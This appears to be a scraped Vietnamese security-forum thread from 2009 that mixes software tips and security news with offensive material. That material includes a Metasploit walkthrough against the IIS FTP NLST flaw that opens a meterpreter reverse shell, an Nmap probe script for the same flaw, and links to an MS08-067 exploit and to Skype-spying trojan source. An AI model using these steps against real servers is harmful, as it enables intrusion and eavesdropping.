|
|
bạn đang dùng phiên bản nào,thử upgrade lên phiên bản mới nhất coi: http://messenger.yahoo.com/winbeta
|
|
|
Hiện Bkis đang tặng báo eChip 3000 key bản quyền BKAV 2009 loại 3 tháng(thay vì 6 tháng như kaspersky)
Các bước đăng ký như sau:
1. Soạn thư với tiêu đề Đăng ký nhận key BKAV 2009, nội dung xin xỏ nhưng ngắn gọn, giới thiệu họ tên. VD mình gửi như sau:
Chào quý báo!
Em là Thắng, một fan của eChip và BKAV!
Em có đọc trên eChip Thứ 6 có bài viết về BKAV 2009 với nhiều cải tiến rất hay thật xứng đáng là 1 phần mềm diệt Virus số một của thế giới, em đã xài phần mềm này hơn vài chục năm nay vì xếp em bắt làm thế và hiện nay eChip lại đang có chương trình tặng key cho bạn đọc. Bởi thế em rất muốn đăng ký nhận 1 key của phần mềm này để về cài cho máy của con ghệ em vì thật ra thì nàng cũng rất ái mộ BKAV và Tử Quảng như em.
Mong được eChip chấp thuận.
Em xin cảm ơn eChip nhiều nhiều!
Chào đại đoàn kết và quyết thắng.
2. Gửi đến hòm thư toasoan@baoechip.com
3. Chờ một buổi là có key thôi. Ai gửi nhanh mới đc vì cái tin này là từ sáng nay rồi
tặng key mà chỉ dùng có 3 tháng
http://www.quantrimang.com.vn/kienthuc/kien-thuc-co-ban/59905_3_phan_mem_AntiVirus_mien_phi_va_huu_dung_cho_Windows.aspx
http://www.tuoitre.com.vn/Tianyon/Index.aspx?ArticleID=333335&ChannelID=16
|
|
|
http://securestate.blogspot.com/2009/08/wpa-flawed-not-broken.html
|
|
|
@St Konqueror:em cũng vừa bị lỗi như bác odouroflove trên,có thể đó là 1 trong số nhiều nguyên nhân xảy ra lỗi này thôi
|
|
|
Sau hơn ba năm “quy ẩn giang hồ”, hôm 28-8 vừa qua, tác giả Phạm Kim Long đã bất ngờ tung ra phiên bản Unikey 4.0 RC2.
Unikey 4.0 RC2 đã được khắc phục một số lỗi còn tồn tại trong bản Unikey 4.0 RC1, hoạt động tốt trong cả môi trường Windows 64-bit (kể cả Windows Vista/7 64-bit), hỗ trợ gõ tốt tiếng Việt trong Internet Explorer mà không tắt chế độ bảo vệ. Đây là ba cải tiến đáng nhắc đến nhất của Unikey 4.0 RC2.
Nếu Unikey 4.0 RC1 đang dùng bị lỗi, hoặc gặp trục trặc về tính tương thích với Windows Vista/7, bạn hãy mau chóng tải về Unikey 4.0 RC2 (bản chạy trực tiếp mà không cần cài đặt).
Lưu ý: Trước khi xài Unikey 4.0 RC2, bạn cần đóng biểu tượng Unikey của phiên bản cũ trên khay hệ thống (bằng cách nhấp phải chuột vào biểu tượng và chọn “Kết thúc”), hoặc gỡ bỏ luôn phiên bản cũ.
Sau khi tải về máy và giải nén file zip vào một thư mục nào đó, bạn mở thư mục con unikey32 (với phiên bản dành cho Windows 32-bit), hoặc unikey64 (với phiên bản dành cho Windows 64-bit), rồi bấm đôi vào file UniKeyNT.exe để kích hoạt Unikey 4.0 RC2.
Ngoài UniKeyNT.exe, trong thư mục vừa xả nén chỉ còn hai file khác là UKHook40.dll và keymap.txt.
Nếu sử dụng Unikey 4.0 RC2 trong Windows Vista/7, bạn dễ nhận thấy khung viền bao quanh bảng điều khiển Unikey 4.0 RC2 nay đã được áp dụng hiệu trong suốt khá bắt mắt; còn số lượng và cách bố trí các tính năng cũng như biểu tượng trên khay hệ thống của Unikey 4.0 RC2 vẫn giống y như Unikey 4.0 RC1.
Hiện thời, tác giả Phạm Kim Long mới chỉ phân phối Unikey 4.0 RC2 dưới dạng file zip (giải nén và chạy trực tiếp để sử dụng). Trong thời gian tới, tác giả sẽ tiếp tục tung ra bản cài đặt của Unikey 4.0 RC2
-------------------------------------------------------------------------------------------------------------------------------
Unikey là chương trình gõ tiếng Việt Unicode phổ biến tại Việt Nam đối với người dùng tiếng Việt Unicode. Unikey cho phép gõ tiếng Việt Unicode trong các tài liệu Word, Excel và nhiều chương trình khác trên mọi hệ điều hành Window. Không những thế, UniKey còn có mã nguồn mở theo The GNU General Public License .
Unikey đã được Ủy ban Quốc gia về chuẩn tiếng Việt Unicode của Bộ Khoa học và Công nghệ khuyến cáo sử dụng trong các cơ quan nhà nước Việt Nam. Đặc điểm nổi bật của chương trình là chạy nhanh và có tính ổn định cao. Unikey tương thích với rất nhiều phần mềm hỗ trợ Unicode...
UniKey hỗ trợ:
- Nhiều bảng tiếng Việt thông dụng.
- Unicode tổ hợp và dựng sẵn .
- TCVN3 (ABC), BK HCM1, BK HCM2, Vietware-X, Vietware-F .
- VIQR, VNI, VPS, VISCII .
- Unicode encodings: UTF-8, NCR Decimal/Hexadecimal - dùng cho Web.
- Windows 1258 code page (chuẩn tiếng Việt của Microsoft).
- 3 phương pháp gõ thông dụng nhất: TELEX, VNI và VIQR.
- Chuyển đổi giữa các bảng mã tiếng Việt.
- Tất cả các phiên bản Windows 32 bit: Windows 9x/ME, Windows NT/2000/XP.
- UniKey chỉ có kích thước nhỏ và không yêu cầu thêm bất cứ thư viện nào khác.
- UniKey có thể chạy mà không cần cài đặt.
---------------------------------------link tải:
http://www.download.com.vn/Data/Soft/2009/09/01/32unikey40RC2_Download.com.vn.zip
http://www.download.com.vn/Data/Soft/2009/09/01/64unikey40RC2_Download.com.vn.zip
nguồn: download.com.vn
|
|
|
http://www.giaiphapexcel.com/forum/cmps_index.php
|
|
|
freeze_love wrote:
Bạn dùng tool của tớ xem sao? http://freeze_love.summerhost.info/blog/read.php?1
(Ở Tab Other, nút Drive). Hy vọng có thể giúp bạn?
he he,bác freeze_love PR dữ quá
----------------------------------------------------------------
bạn sử dụng lệnh Diskpart cho nhanh:
1. Vào start > run và đánh vào "diskpart",cửa sổ Dos xuất hiện:
Code:
Microsoft DiskPart version 5.1.3565
2. Đánh “list volume” . Bạn sẽ nhìn thấy những thông tin tương tự thế này :
Code:
Copyright (C) 1999-2003 Microsoft Corporation.
On computer: AMD64-3000
DISKPART> list volume
Volume ### Ltr Label Fs Type size Status Info
---------- --- ----------- ----- ---------- ------- --------- --------
Volume 0 W DVD-ROM 0 B
Volume 1 V DVD-ROM 0 B
Volume 2 N DVD-ROM 0 B
Volume 3 C MainATA NTFS Partition 20 GB Healthy System
Volume 4 D Programs NTFS Partition 92 GB Healthy Pagefile
Volume 5 H WinVista 32 NTFS Partition 112 GB Healthy
Volume 6 E AClassNewDV NTFS Partition 190 GB Healthy
Volume 7 G Max300 NTFS Partition 279 GB Healthy
Volume 8 F BClassMovie NTFS Partition 190 GB Healthy
DISKPART>
3. Nếu bạn muốn hide ổ đĩa D bạn gõ “select volume 4” . Khi đó một thông báo sẽ xuất hiện { Volume 4 is the selected volume} .
4. Bây giờ , bạn gõ "remove letter D" .
Một thông báo mới { Diskpart Removed the Drive letter }.
Nó sẽ yêu cầu khởi động máy tính .
Diskpart sẽ gỡ bỏ mẫu ký tự (letter of volume disk). Windows XP không thể nhận biết ra unknown volume .
Kết quả là bạn sẽ giấu được dữ liệu quan trọng của mình trong ổ dĩa đó.
Để khôi phục lại, chẵng hạn bạn vừa hide D driver bây giờ bạn sẽ làm lại giống như 3 bước đầu bước thứ 4 bạn thay thể “remove” bằng “assign“
Thoát ra Diskpart thì dùng lệnh Exit.
Cách này chỉ cho những người không biết lệnh diskpart. Nếu họ biết thì họ có dùng lệnh này thể thay đỗi trở lại.
Muốn cho người khác không dùng được lệnh DISKPART này thì lệnh DISKPART.exe nằm trong C:\windows\system32 và cũng nằm ở C:\windows\system32\dllcache. Bạn dời DISKPART.exe ra chổ khác (một Folder nào đó) và rename nó lại thành VODANH.exe thì người khác không biết đâu mà tìm.
nguồn:internet
|
|
|
chào các bác,bác nào có quyển Just For Fun: Linus Torvalds Biography,chia sẽ cho em được không,em đang cần cuốn này,tiếng việt càng tốt
|
|
|
tìm kiếm trên google với từ khóa: "trace email"
http://www.online-tech-tips.com/computer-tips/how-to-track-the-original-location-of-an-email-via-its-ip-address/
|
|
|
Jino_Hoang wrote:
Bác nào có thể cho em biết roc hơn về công cụ này không.
Em đã nghe qua nhiều công cụ nhưng chưa nghe qua cái này bao giờ
1 tool dạng như smurf 2k
|
|
|
các bạn có thể sử dụng đoạn Nmap script sau để phát hiện server bị lỗi FTP oday:
Code:
--- Checks if a Microsoft FTP server allows anonymous logins + MKDIR
--- If yes, could be vulnerable to the following exploit:
--- http://seclists.org/fulldisclosure/2009/Aug/0443.html
-- @output
-- |_ FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
--
-- @args ftpuser Alternate user to initiate the FTP session
-- ftppass Alternate password to initiate the FTP session
-- If no arguments are passed, anonymous FTP session is probed
id="IIS FTP"
description="Checks to see if a Microsoft ISS FTP server allows anonymous logins and MKDIR (based on anonftp.nse by Eddie Bell <ejlbell@gmail.com>)"
author = "Xavier Mertens <xavier@rooshell.be>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"default", "auth", "intrusive"}
require "shortport"
local stdnse = require "stdnse"
---
-- portrule = shortport.port_or_service(21, "ftp")
portrule = function(host,port)
if (port.number == 21 and
(port.state == "open" or port.state == "open|filtered"))
then
return true
else
return false
end
end
---
-- Connects to the ftp server and checks if the server allows
-- anonymous logins or any credentials passed as arguments
action = function(host, port)
local socket = nmap.new_socket()
local result
local status = true
local isAnon = false
local err_catch = function()
socket:close()
end
local try = nmap.new_try(err_catch())
socket:set_timeout(5000)
try(socket:connect(host.ip, port.number, port.protocol))
if (type(nmap.registry.args.ftpuser) == "string" and nmap.registry.args.ftpuser ~= "" and
type(nmap.registry.args.ftppass) == "string" and nmap.registry.args.ftppass ~= "")
then
local struser = "USER " .. nmap.registry.args.ftpuser .. "\r\n"
local strpass = "PASS " .. nmap.registry.args.ftppass .. "\r\n"
try(socket:send(struser))
try(socket:send(strpass))
else
try(socket:send("USER anonymous\r\n"))
try(socket:send("PASS IEUser@\r\n"))
end
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^230") then
try(socket:send("RSTATUS\r\n"))
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^211-Microsoft FTP Service") then
try(socket:send("MKD w00t\r\n"))
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^257") then
isVuln=true
try(socket:send("RMDIR w00t\r\n"))
break;
end
end
end
end
end
end
socket:close()
if(isVuln) then
return "IIS Server allow anonymous and mkdir (potentially vulnerable)"
end
end
Code:
# nmap -p 21 -sV --script=IIS-FTP --scriptargs=ftpuser=foo,ftppass=bar 10.0.0.7
|
|
|
/hvaonline/posts/list/31037.html
PS:bạn đưa cái hình ấy lên làm gì vậy
|
|
|
hướng dẫn tấn công bằng metasploit:
Code:
=[ msf v3.3-dev
+ -- --=[ 403 exploits - 273 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 193 aux
msf > use exploit/windows/ftp/microsoft_ftpd_nlst
msf exploit(microsoft_ftpd_nlst) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(microsoft_ftpd_nlst) > set LHOST 192.168.0.136
LHOST => 192.168.0.136
msf exploit(microsoft_ftpd_nlst) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf exploit(microsoft_ftpd_nlst) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 192.168.0.128:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password <a href="mailto:mozilla@example.com">mozilla@example.com</a>...
[*] Sending password...
[*] 257 "RTIXDYMRJB" directory created.
[*] 250 CWD command successful.
[*] Creating long directory...
[*] 257 "SQL�UURU5UUUU@�8QKORu�@@@@��GVSVIHLODRPRVJDPILGXHZNKLNIYQZKGXCWEAGFGHTXSXDBYDLLXKGKYWUJNJGTZX����ASNOHNZRTDAAMVPKVEQRAVWPUJNGYKWSAIUMUPWLBU������������w�����YYTPSDOYTB�f���ICVFVCFUIZKQTRMIEWETKWE" directory created.
[*] 200 PORT command successful.
[*] Trying target Windows 2000 SP4 Universal (IIS 5.0)...
[*] 150 Opening ASCII mode data connection for file list.
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.128:1076)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
|
|
|
1. Thông tin chung
Ngày 01/09/2008, lỗ hổng zero-day trong dịch vụ FTP của phần mềm IIS đã được công bố cùng với mã khai thác. Đây là lỗ hổng nghiêm trọng cho phép hacker dễ dàng tấn công và kiếm soát máy chủ IIS từ xa. Đây là một lỗ hổng nghiêm trọng, có thể ảnh hướng tới nhiều hệ thống máy chủ Web tại Việt Nam, vì phần lớn máy chủ cài IIS đều có cài thêm dịch vụ FTP của Microsoft.
2. Mô tả kỹ thuật
IIS (hay Internet Information Server) là phần mềm cung cấp các dịch vụ máy chủ Internet của Microsoft như HTTP, FTP, SMTP… Lỗ hổng zero-day được phát hiện nằm trong quá trình xử lý giao thức FTP của IIS.
Cụ thể, giao thức FTP hỗ trợ một câu lệnh như sau: NLST [remote-directory]. Câu lệnh trên cho phép FTP client liệt kê các file có trong thư mục [re mote-directory] trên máy chủ.
Dịch vụ FTP của IIS cũng hỗ trợ câu lệnh này, tuy nhiên với một đường dẫn [remote-directory] đặc biệt và dài “quá khổ”, IIS đã xử lý không tốt dẫn đến lỗi tràn bộ đệm cho phép chuyển điều khiển đến mã độc.
Lợi dụng lỗ hổng này, hacker có thể dễ dàng tấn công các máy chủ IIS có hỗ trợ FTP bằng cách thực hiện kết nối, đăng nhập và gửi lệnh NLST chứa mã độc nhằm kiểm soát toàn bộ máy chủ IIS. Lỗ hổng này sẽ đặc biệt nghiêm trọng nếu IIS cho phép các kết nối mà không cần quyền xác thực (anonymous).
3. Cập nhật bản vá
Đánh giá đây là lỗ hổng đặc biệt nghiêm trọng và việc Microsoft chưa thể đưa ra bản vá, Bkis khuyến cáo các quản trị mạng của các đơn vị, các cá nhân nên ngừng sử dụng chức năng FTP của IIS cho đến khi có bản vá chính thức.
Bkis Security
http://www.quantrimang.com.vn/baomat/bao-mat/tin-bao-mat/59821_Microsoft_IIS_Server_bi_tan_cong.aspx
http://bkav.com.vn/tinh_hinh_an_ninh_mang/01/09/2009/6/2435/
http://milw0rm.com/exploits/9541
fix lỗi tạm thời:
* Tắt các dịch vụ FTP nếu bạn không cần nó
* Ngăn chặn việc tạo các thư mục mới bằng cách sử dụng NTFS ACL
* Ngăn chặn người dùng vô danh thông qua các thiết lập IIS
|
|
|
có bác nào xóa bớt 1 trong 2 bài của bmrobot hoặc Mr.bi đi nhỉ
|
|
|
post trùng bài rồi bác ơi,có bác Mr.bi post bài này rồi
|
|
|
A new 0-day exploit for the FTP server included within the Microsoft IIS suite has been released today. Check the post on the Full Disclosure mailing list for more details.
Based on an existing Nmap script, I quickly wrote a new one which performs the following actions:
* Check if anonymous sessions are allowed.
* Check if the detected FTP server is running Microsoft ftpd.
* Check if the MKDIR command is allowed (this seems to be required by the exploit)
If all those conditions are met, the script exits with a warning message. Note that my script will only report servers which could be vulnerable. On the other side, running a server with anonymous users able to create directories is a major security breach and must be fixed independently of the newly discovered vulnerability!
script:
http://blog.rootshell.be/wp-content/uploads/2009/08/IIS-FTP.nse
copy đoạn script vào /usr/local/share/nmap/scripts/ sau đó rebuild your scripts index
Code:
khai thác:
Code:
# Nmap-p 21-sV - script = IIS-FTP 10.0.0.7
Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST
Interesting ports on test-win (10.0.0.7):
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
Service Info: OS: Windows
http://seclists.org/fulldisclosure/2009/Aug/0443.html
|
|
|
art88 wrote:
Tìm hiểu về các nguyên lý hoạt động của vr quá khó không các bác? Điều kiện tiên quyết là gì vậy?
Theo em, viết vr phá hoại ko nên chút nào. Nhưng viết vr với mục đích học tập thì thú vị thật, vấn đề là
thật khó tiếp cận lĩnh vực này. Mong các bác chỉ giúp
theo ý kiến cá nhân của mình thi điều kiện tiên quyết là hiểu rõ hệ thống virus sẽ lây nhiễm,dữa vào lỗi của hệ thống ví dụ conficker sẽ lây lan qua lỗi NZM-MS08-67
Patched up now but pretty much everyone running an unpatched XP SP2/SP3 was vulnerable. A lot of ISP's have now also blocked the port, but of course there are exceptions. The MS08-067 exploit can scan for vulnerable machines and infect them quite easily, causing it to spread automatically without hassle.
http://rapidshare.com/files/271123667/NZM-MS08-67.rar
nhưng quan trọng hơn cả là lập trình,hiểu rõ nguyên lí của hệ điều hành(linux,win...)
|
|
|
Astalavista's Security Toolbox DVD 2008 (v5.0) is considered to be the largest and
most comprehensive Information Security archive. As always we are committed to
provide you with a resource for all of your security and hacking interests, in an
interactive way! The Information found on the Security Toolbox DVD has been
carefully selected, so that you will only browse through quality information and
tools. No matter if you are a computer enthusiast, a computer geek, a newbie
looking for information on "how to hack", or an IT Security professional looking
for quality and up to date information for offline use or just for convenience, we
are sure that you will be satisfied, even delighted by the DVD!
Main benefits:
- almost 40% off the real price (49.95 USD) so you get the Astalavista's Security
Toolbox DVD 2008 (v5.0) for only 29.95 USD
- Extremely comprehensive (about 2'562 Tools!)
- Very well sorted archive with detailed descriptions (276 categories!)
- Improved performance of the Security Toolbox, information has never been that
easier to find
- You can download the DVD yourself at home
- You will automatically become part of the new Astalavista's Promotion Service,
meaning that you will receive information about promotions and special services,
which is not going to be released to the public.
System requirements
* Windows 95/ME/98/2000/NT/XP/Vista
* DVD-R Drive or a virtual drive
Code:
http://www.megaupload.com/?d=44DB7YB0
http://www.megaupload.com/?d=3SZ4B83W
http://www.megaupload.com/?d=4AVDQ5WW
http://www.megaupload.com/?d=BOZ45GZD
http://www.megaupload.com/?d=5N51R6HZ
|
|
|
bạn thử sử dụng lệnh Diskpart:
http://aloxovn.com/forum/showthread.php?t=6317
|
|
|
thế bạn đã tắt system restore chưa
|
|
|
o0badboy0o wrote:
khi gõ lệnh mstsc trong xp thì nó sẽ tự động kết nối kiểu consle, không giống như win 2k3 . vậy có cách nào remote theo kiểu bt không vậy mấy bro? chỉ e với
remote theo kiểu bt là remote kiểu gì vậy bạn,có phải là remote trong back-track không vậy
|
|
|
Trojan.Peskyspy thu lén cuộc gọi của Skype
Nhóm nghiên cứu của Symantec vừa phát hiện sự xuất hiện đoạn mã của một loại sâu Trojan nhắm tới người dùng dịch vụ VoIP (thoại qua IP) của Skyke.
Sâu Trojan này có khả năng ghi lại những cuộc gọi trên Skype thành định dạng MP3 và gửi đoạn file hội thoại này tới kẻ tấn công. Về bản chất, đây là kiểu nghe lén và phá vỡ tính bảo mật của một cuộc gọi điện thoại Skype.
Các chuyên gia của Symantec xác định sâu Trojan này có tên Trojan.Perskyspy và có thể được tải về một máy tính bằng cách dùng thư email lừa đảo hoặc các cách thức khác để lừa người dùng. Khi mà máy bị lây nhiễm sâu, thì sâu này có thể dùng một ứng dụng kiểm soát quá trình xử lý âm thanh của máy tính, và ghi lại hội thoại của cuộc gọi ở dạng tập tin MP3. Đoạn âm thanh MP3 này sau đó được gửi qua Internet tới một máy chủ mà kẻ tấn công xác định trước để nghe toàn bộ đoạn hội thoại đã ghi âm được. Kiểu ghi cuộc gọi ở định dạng MP3 sẽ làm dung lượng tập tin âm thanh khá nhỏ, nhờ đó truyền dẫn ít dữ liệu qua mạng hơn, giúp tăng tốc độ truyền dẫn và tránh được sự kiểm tra phát hiện bất thường.
Sâu Trojan này nhắm tới những kỹ thuật hook API (giao diện lập trình ứng dụng) của Windows, theo đó các ứng dụng âm thanh thường sử dụng kỹ thuật này của Microsoft (hook là một kỹ thuật được sử dụng để thay đổi hành vi xác định của một ứng dụng). Trojan này chiếm quyền kiểm soát hệ thống, và thông qua kỹ thuật hooking, nó có thể nghe lén cuộc hội thoại trước khi nó tới được phần mềm Skype hoặc tới bất kỳ một ứng dụng âm thanh nào khác.
Symantec nhận định vào thời điểm hiện tại, rủi ro gây ra bởi mối đe dọa này chưa cao và chưa thấy có một cuộc lây lan rộng nào. Tuy nhiên, do mã nguồn này đã có công khai trên mạng, nên những kẻ viết phần mềm malware độc hại có thể tích hợp tính năng này vào những mối đe dọa của riêng chúng. Người dùng máy tính cần áp dụng chặt chẽ những biện pháp bảo mật tốt nhất, cài đặt và cập nhật thường xuyên chương trình bảo mật, không nhấp chuột vào bất kỳ đường liên kết (link) nào trong bất kỳ email không rõ nguồn gốc nào.
-----------------------
Lưu ý: Trojan nghe lén dữ liệu và các thiết bị âm thanh, nó tập hợp các âm thanh độc lập của bất kỳ ứng dụng giao thức cụ thể hoặc mã hóa được áp dụng bởi Skype khi nó chuyển dữ liệu tiếng nói ở cấp độ mạng.
+ đi và đến dữ liệu âm thanh được lưu trữ thành files .Mp3 . Trojan này cũng sẽ mở ra một "cánh cửa" trở lại vào máy tính bị nhiễm, cho phép kẻ tấn công để thực hiện các công việc sau:
- Gửi tin mp3 đến một địa điểm định trước.
- Tải về một phiên bản cập nhật
- Xóa các Trojan từ máy tính bị nhiễm "
Source released,Files ( cpp ) :
http://www.megapanzer.com/source-code/#skypetrojan
|
|
|
xuduaqueanh wrote:
sao mà toàn tiếng Anh thế này ??
học security và hacking mà đọc sách tiếng việt thì bao giờ mới giỏi được
|
|
|
nâng quyền lên root:
Code:
rồi:
Code:
ipconfig eth0 <your ip addres>
route add default gw <default gateaway>
echo nameserver <server name ip> > /etc/resolv.conf
ifconfig eth0 up
dùng back track thì vào remote exploit-forum thảo luận(box Newbie Area),trong đó đã có nhiều chủ để thảo luận về việc này rồi,bạn vào đó tìm nhé:
http://forums.remote-exploit.org/
tham khảo thêm ở dưới:
-------------------------
Code:
back|track 4 boots with networking disabled. You don't always want to SCREAM for DHCP when plugging into a client's network.
To enable networking by DHCP:
code:
/etc/init.d/networking start
To do things manually, first assign an IP address and subnet mask:
code:
ifconfig eth0 <IP address> netmask <subnet mask>
Example: ifconfig eth0 192.168.1.100 netmask 255.255.255.0
Configure the default gateway:
code:
route add default gw <default gateway IP address>
Example: route add default gw 192.168.1.1
Configure the DNS server:
code:
echo "nameserver <DNS server's IP address>" > /etc/resolv.conf
Example: echo "nameserver 192.168.1.1" > /etc/resolv.conf
*** FIX ***
After running apt-get update, the dhcpd3 service may try to start at boot up and fail. The apache2 service also starts. To correct this:
code:
update-rc.d -f dhcp3-server remove
update-rc.d -f apache2 remove
credit: mfBaranian, KMDave
|
|
|
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
|
|
|
luyendzung.vn wrote:
Hàng VN thì làm sao bằng Hàng Ngoại Nhập được. (ít ra là vậy). Tiền bạc không thành vấn đề, miễn sao BK làm việc OK 100% là ổn rồi.
Hi, khổ nỗi nó ngốn Ram kinh khủng (VN mà thế này thì nghèo mãi đấy)
Dù sao thì vẫn mong BK ngày mỗi lớn mạnh để rạng danh dân tộc trên trương quốc tế chứ. KAKA
Tớ rất ủng hộ
có coi đoạn trailer BKAV 2009 chưa:
http://www.bkav.com.vn/home/taibkavpro2009.aspx
|
|
|
Bẻ khóa bảo mật mạng Wi-Fi chỉ trong 1 phút
Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
http://tech.yahoo.com/news/pcworld/20090827/tc_pcworld/newattackcrackscommonwifiencryptioninaminute
tài liệu
http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf
|
|
|
@all:cái này mình cũng vừa mắc phải,nó có liên quan đến phần cứng cụ thể là lỗi main hay bộ nguồn,bác odouroflove nên đem đi bảo hành để họ khắc phục
|
|
|
SauRang.DH wrote:
Làm j co web bảo mật nào vô đối đâu
Yahoo! Local Hacked - via SQL Injection
A greyhat hacker has discovered a critical SQL injection vulnerability in Yahoo! Local Neighbors discussion board website. The flaw can be used to read information about administrative and user accounts or upload a shell on the server.
Neighbors is a Yahoo! Local feature launched at the end of 2007 with the purpose of providing a place for people to exchange information about events happening in their local communities and other useful info. Yahoo! describes the site as a "practical discussion board for any topic - from neighborhood safety to contractor recommendations."
The hacker who discovered the vulnerability goes by the online nickname of "Unu" and had previously uncovered similar vulnerabilities in other high profile websites. He notes that despite finding SQL injection and cross-site scripting (XSS) vulnerabilities in Yahoo! websites before, this is the first time when he encountered a MySQL 5 server being used by the company.
/etc/passwd file
http://unu1234567.wordpress.com/ ---> blog hacker unu
http://news.softpedia.com/news/Yahoo-Local-Hacked-120044.shtml
|
|
|
|
|
|
|